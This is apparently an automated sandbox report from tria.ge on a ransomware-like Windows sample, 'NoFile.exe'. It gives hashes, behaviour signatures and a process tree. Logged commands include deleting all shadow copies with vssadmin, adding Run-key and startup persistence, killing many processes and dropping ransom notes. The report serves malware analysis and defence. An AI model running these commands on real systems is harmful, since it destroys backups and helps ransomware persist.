Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
06/02/2022, 09:18
Static task
static1
Behavioral task
behavioral1
Sample
NoFile.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
NoFile.exe
Resource
win10v2004-en-20220112
General
-
Target
NoFile.exe
-
Size
2.2MB
-
MD5
7d1ed67b77f47ba8aadf9a3ac7d0c371
-
SHA1
a598e6708c189caeef1fa76064feb4d0155abb3d
-
SHA256
87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
-
SHA512
17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe NoFile.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini NoFile.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: NoFile.exe File opened (read-only) \??\h: NoFile.exe File opened (read-only) \??\n: NoFile.exe File opened (read-only) \??\q: NoFile.exe File opened (read-only) \??\s: NoFile.exe File opened (read-only) \??\J: NoFile.exe File opened (read-only) \??\V: NoFile.exe File opened (read-only) \??\X: NoFile.exe File opened (read-only) \??\U: NoFile.exe File opened (read-only) \??\v: NoFile.exe File opened (read-only) \??\E: NoFile.exe File opened (read-only) \??\Z: NoFile.exe File opened (read-only) \??\y: NoFile.exe File opened (read-only) \??\R: NoFile.exe File opened (read-only) \??\T: NoFile.exe File opened (read-only) \??\a: NoFile.exe File opened (read-only) \??\p: NoFile.exe File opened (read-only) \??\t: NoFile.exe File opened (read-only) \??\F: NoFile.exe File opened (read-only) \??\L: NoFile.exe File opened (read-only) \??\O: NoFile.exe File opened (read-only) \??\x: NoFile.exe File opened (read-only) \??\i: NoFile.exe File opened (read-only) \??\r: NoFile.exe File opened (read-only) \??\H: NoFile.exe File opened (read-only) \??\b: NoFile.exe File opened (read-only) \??\f: NoFile.exe File opened (read-only) \??\S: NoFile.exe File opened (read-only) \??\Y: NoFile.exe File opened (read-only) \??\g: NoFile.exe File opened (read-only) \??\j: NoFile.exe File opened (read-only) \??\l: NoFile.exe File opened (read-only) \??\A: NoFile.exe File opened (read-only) \??\K: NoFile.exe File opened (read-only) \??\M: NoFile.exe File opened (read-only) \??\W: NoFile.exe File opened (read-only) \??\k: NoFile.exe File opened (read-only) \??\m: NoFile.exe File opened (read-only) \??\o: NoFile.exe File opened (read-only) \??\B: NoFile.exe File opened (read-only) \??\G: NoFile.exe File opened (read-only) \??\Q: NoFile.exe File opened (read-only) \??\u: NoFile.exe File opened (read-only) \??\w: NoFile.exe File opened (read-only) \??\z: NoFile.exe File opened (read-only) \??\I: NoFile.exe File opened (read-only) \??\N: NoFile.exe File opened (read-only) \??\P: NoFile.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\msadc\msdaremr.dll NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Portal\PortalConnectCore.dll NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html NoFile.exe File created \??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml NoFile.exe File created \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BOLDSTRI\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm NoFile.exe File opened for modification \??\c:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml NoFile.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\SystemV\AST4 NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\PHONE.XML NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\SPRING.ELM NoFile.exe File created \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml NoFile.exe File opened for modification \??\c:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll NoFile.exe File created \??\c:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\pkeyconfig.companion.dll NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML NoFile.exe File created \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\Read_Me!_.txt NoFile.exe File created \??\c:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna NoFile.exe File opened for modification \??\c:\Program Files\Windows Photo Viewer\ImagingDevices.exe NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\ReachFramework.resources.dll NoFile.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png NoFile.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\Asia\Makassar NoFile.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png NoFile.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png NoFile.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api NoFile.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar NoFile.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar NoFile.exe File created \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE14\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png NoFile.exe File created \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar NoFile.exe File created \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Read_Me!_.txt NoFile.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml NoFile.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Pagesfilo.sys NoFile.exe File opened for modification C:\Windows\Pagesfilo.sys NoFile.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 560 schtasks.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 968 timeout.exe 672 timeout.exe 552 timeout.exe 1708 timeout.exe 688 timeout.exe 1588 timeout.exe 1740 timeout.exe 560 timeout.exe 1780 timeout.exe 1656 timeout.exe -
Enumerates processes with tasklist 1 TTPs 11 IoCs
pid Process 1928 tasklist.exe 1872 tasklist.exe 796 tasklist.exe 1820 tasklist.exe 1696 tasklist.exe 968 tasklist.exe 1396 tasklist.exe 972 tasklist.exe 632 tasklist.exe 1060 tasklist.exe 364 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 964 systeminfo.exe 1160 systeminfo.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1260 vssadmin.exe 772 vssadmin.exe -
Kills process with taskkill 40 IoCs
pid Process 1520 taskkill.exe 1780 taskkill.exe 1552 taskkill.exe 1984 taskkill.exe 1664 taskkill.exe 1364 taskkill.exe 2020 taskkill.exe 292 taskkill.exe 1548 taskkill.exe 920 taskkill.exe 932 taskkill.exe 268 taskkill.exe 1924 taskkill.exe 688 taskkill.exe 1260 taskkill.exe 1272 taskkill.exe 1044 taskkill.exe 1776 taskkill.exe 1732 taskkill.exe 1272 taskkill.exe 1060 taskkill.exe 624 taskkill.exe 864 taskkill.exe 1612 taskkill.exe 1524 taskkill.exe 316 taskkill.exe 820 taskkill.exe 964 taskkill.exe 1244 taskkill.exe 1728 taskkill.exe 460 taskkill.exe 2028 taskkill.exe 580 taskkill.exe 1696 taskkill.exe 1740 taskkill.exe 364 taskkill.exe 1300 taskkill.exe 1708 taskkill.exe 1396 taskkill.exe 560 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 856 reg.exe 672 reg.exe 1732 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 796 tasklist.exe 796 tasklist.exe 632 tasklist.exe 632 tasklist.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 796 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 796 tasklist.exe Token: SeDebugPrivilege 632 tasklist.exe Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeDebugPrivilege 796 taskmgr.exe Token: SeDebugPrivilege 1820 tasklist.exe Token: SeIncreaseQuotaPrivilege 460 WMIC.exe Token: SeSecurityPrivilege 460 WMIC.exe Token: SeTakeOwnershipPrivilege 460 WMIC.exe Token: SeLoadDriverPrivilege 460 WMIC.exe Token: SeSystemProfilePrivilege 460 WMIC.exe Token: SeSystemtimePrivilege 460 WMIC.exe Token: SeProfSingleProcessPrivilege 460 WMIC.exe Token: SeIncBasePriorityPrivilege 460 WMIC.exe Token: SeCreatePagefilePrivilege 460 WMIC.exe Token: SeBackupPrivilege 460 WMIC.exe Token: SeRestorePrivilege 460 WMIC.exe Token: SeShutdownPrivilege 460 WMIC.exe Token: SeDebugPrivilege 460 WMIC.exe Token: SeSystemEnvironmentPrivilege 460 WMIC.exe Token: SeRemoteShutdownPrivilege 460 WMIC.exe Token: SeUndockPrivilege 460 WMIC.exe Token: SeManageVolumePrivilege 460 WMIC.exe Token: 33 460 WMIC.exe Token: 34 460 WMIC.exe Token: 35 460 WMIC.exe Token: SeIncreaseQuotaPrivilege 460 WMIC.exe Token: SeSecurityPrivilege 460 WMIC.exe Token: SeTakeOwnershipPrivilege 460 WMIC.exe Token: SeLoadDriverPrivilege 460 WMIC.exe Token: SeSystemProfilePrivilege 460 WMIC.exe Token: SeSystemtimePrivilege 460 WMIC.exe Token: SeProfSingleProcessPrivilege 460 WMIC.exe Token: SeIncBasePriorityPrivilege 460 WMIC.exe Token: SeCreatePagefilePrivilege 460 WMIC.exe Token: SeBackupPrivilege 460 WMIC.exe Token: SeRestorePrivilege 460 WMIC.exe Token: SeShutdownPrivilege 460 WMIC.exe Token: SeDebugPrivilege 460 WMIC.exe Token: SeSystemEnvironmentPrivilege 460 WMIC.exe Token: SeRemoteShutdownPrivilege 460 WMIC.exe Token: SeUndockPrivilege 460 WMIC.exe Token: SeManageVolumePrivilege 460 WMIC.exe Token: 33 460 WMIC.exe Token: 34 460 WMIC.exe Token: 35 460 WMIC.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 364 taskkill.exe Token: SeDebugPrivilege 1396 taskkill.exe Token: SeDebugPrivilege 1364 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe Token: SeDebugPrivilege 920 taskkill.exe Token: SeDebugPrivilege 1696 tasklist.exe Token: SeDebugPrivilege 932 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe 796 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1604 wrote to memory of 808 1604 NoFile.exe 28 PID 1604 wrote to memory of 808 1604 NoFile.exe 28 PID 1604 wrote to memory of 808 1604 NoFile.exe 28 PID 1604 wrote to memory of 808 1604 NoFile.exe 28 PID 808 wrote to memory of 796 808 cmd.exe 29 PID 808 wrote to memory of 796 808 cmd.exe 29 PID 808 wrote to memory of 796 808 cmd.exe 29 PID 808 wrote to memory of 796 808 cmd.exe 29 PID 808 wrote to memory of 1032 808 cmd.exe 30 PID 808 wrote to memory of 1032 808 cmd.exe 30 PID 808 wrote to memory of 1032 808 cmd.exe 30 PID 808 wrote to memory of 1032 808 cmd.exe 30 PID 1604 wrote to memory of 1796 1604 NoFile.exe 32 PID 1604 wrote to memory of 1796 1604 NoFile.exe 32 PID 1604 wrote to memory of 1796 1604 NoFile.exe 32 PID 1604 wrote to memory of 1796 1604 NoFile.exe 32 PID 1604 wrote to memory of 1820 1604 NoFile.exe 33 PID 1604 wrote to memory of 1820 1604 NoFile.exe 33 PID 1604 wrote to memory of 1820 1604 NoFile.exe 33 PID 1604 wrote to memory of 1820 1604 NoFile.exe 33 PID 1820 wrote to memory of 580 1820 cmd.exe 34 PID 1820 wrote to memory of 580 1820 cmd.exe 34 PID 1820 wrote to memory of 580 1820 cmd.exe 34 PID 1820 wrote to memory of 580 1820 cmd.exe 34 PID 1604 wrote to memory of 268 1604 NoFile.exe 35 PID 1604 wrote to memory of 268 1604 NoFile.exe 35 PID 1604 wrote to memory of 268 1604 NoFile.exe 35 PID 1604 wrote to memory of 268 1604 NoFile.exe 35 PID 268 wrote to memory of 560 268 cmd.exe 36 PID 268 wrote to memory of 560 268 cmd.exe 36 PID 268 wrote to memory of 560 268 cmd.exe 36 PID 268 wrote to memory of 560 268 cmd.exe 36 PID 580 wrote to memory of 1624 580 WScript.exe 37 PID 580 wrote to memory of 1624 580 WScript.exe 37 PID 580 wrote to memory of 1624 580 WScript.exe 37 PID 580 wrote to memory of 1624 580 WScript.exe 37 PID 580 wrote to memory of 832 580 WScript.exe 39 PID 580 wrote to memory of 832 580 WScript.exe 39 PID 580 wrote to memory of 832 580 WScript.exe 39 PID 580 wrote to memory of 832 580 WScript.exe 39 PID 832 wrote to memory of 632 832 cmd.exe 41 PID 832 wrote to memory of 632 832 cmd.exe 41 PID 832 wrote to memory of 632 832 cmd.exe 41 PID 832 wrote to memory of 632 832 cmd.exe 41 PID 832 wrote to memory of 1176 832 cmd.exe 42 PID 832 wrote to memory of 1176 832 cmd.exe 42 PID 832 wrote to memory of 1176 832 cmd.exe 42 PID 832 wrote to memory of 1176 832 cmd.exe 42 PID 1604 wrote to memory of 1876 1604 NoFile.exe 43 PID 1604 wrote to memory of 1876 1604 NoFile.exe 43 PID 1604 wrote to memory of 1876 1604 NoFile.exe 43 PID 1604 wrote to memory of 1876 1604 NoFile.exe 43 PID 1876 wrote to memory of 1512 1876 cmd.exe 44 PID 1876 wrote to memory of 1512 1876 cmd.exe 44 PID 1876 wrote to memory of 1512 1876 cmd.exe 44 PID 1876 wrote to memory of 1512 1876 cmd.exe 44 PID 832 wrote to memory of 1260 832 cmd.exe 45 PID 832 wrote to memory of 1260 832 cmd.exe 45 PID 832 wrote to memory of 1260 832 cmd.exe 45 PID 832 wrote to memory of 1260 832 cmd.exe 45 PID 832 wrote to memory of 672 832 cmd.exe 47 PID 832 wrote to memory of 672 832 cmd.exe 47 PID 832 wrote to memory of 672 832 cmd.exe 47 PID 832 wrote to memory of 672 832 cmd.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:1176
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1260
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:672
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1728
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:552
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1860
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1740
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1060
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:560
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:364
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:2004
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1780
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:968
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:292
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1708
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1928
-
-
